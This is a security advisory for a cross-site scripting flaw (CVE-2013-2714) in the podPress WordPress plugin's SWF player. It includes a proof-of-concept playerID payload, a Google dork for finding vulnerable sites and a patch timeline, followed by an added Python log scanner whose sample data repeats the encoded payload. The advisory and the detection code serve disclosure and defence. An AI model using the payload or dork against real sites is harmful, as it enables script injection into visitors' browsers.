# Exploit Title: WordPress podPress Plugin XSS in SWF
# Release Date: 28/03/13
# Author: hip [Insight-Labs]
# Contact: hip@xxxxxxxxxxxxxxxx | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/podpress.8.8.10.17.zip
# Tested on: XPsp3
# Affected version: 8.8.10.13 and earlier
# Google Dork: inurl:/wp-content/plugins/podpress/
# REF: CVE-2013-2714

----------------------------------------
# Introduction:

podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.

----------------------------------------
# XSS - Proof Of Concept:

vulnerable path: /wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf
vulnerable parameter: playerID
POC: /wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//

----------------------------------------
# Patch:

- Vendor was notified on the 25/02/2013
- Vendor released version 8.8.10.17 on 19/03/2013, fixing the bug

----------------------------------------
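
To check whether a site that ran an affected version received requests of this shape, the following added example (not part of the original advisory or of podPress) scans web access log lines for requests to the SWF path whose playerID value is not a plain identifier. The combined log format, the allow-list pattern for legitimate playerID values and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path from the advisory, matched as a suffix so installs in a subdirectory count.
SWF_SUFFIX = "/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf"
# Assumption: legitimate playerID values are short plain identifiers.
SAFE_PLAYER_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Mar/2013:10:00:00 +0000] "GET /wp-content/plugins/podpress'
    '/players/1pixelout/1pixelout_player.swf?playerID=1 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [28/Mar/2013:10:02:11 +0000] "GET /blog/wp-content/plugins/podpress'
    '/players/1pixelout/1pixelout_player.swf'
    '?playerID=%5C%22))%7Dcatch(e)%7Balert(/xss/)%7D// HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [28/Mar/2013:10:03:40 +0000] '
    '"GET /index.php?playerID=%22 HTTP/1.1" 200 880 "-" "-"',
]

def suspicious_player_ids(log_lines):
    """Return (line_number, decoded playerID) for each request to the SWF
    whose playerID value falls outside the allow-list."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(SWF_SUFFIX):
            continue  # a different resource; playerID is only relevant to the SWF
        # parse_qs percent-decodes values, so encoded quotes and braces are seen
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() != "playerid":  # conservative: ignore parameter case
                continue
            for value in values:
                if not SAFE_PLAYER_ID.fullmatch(value):
                    hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_player_ids(SAMPLE_LOG):
        print(f"line {number}: unexpected playerID {value!r}")
```

A hit only shows that such a request was made; the fix remains the upgrade to 8.8.10.17 noted in the Patch section.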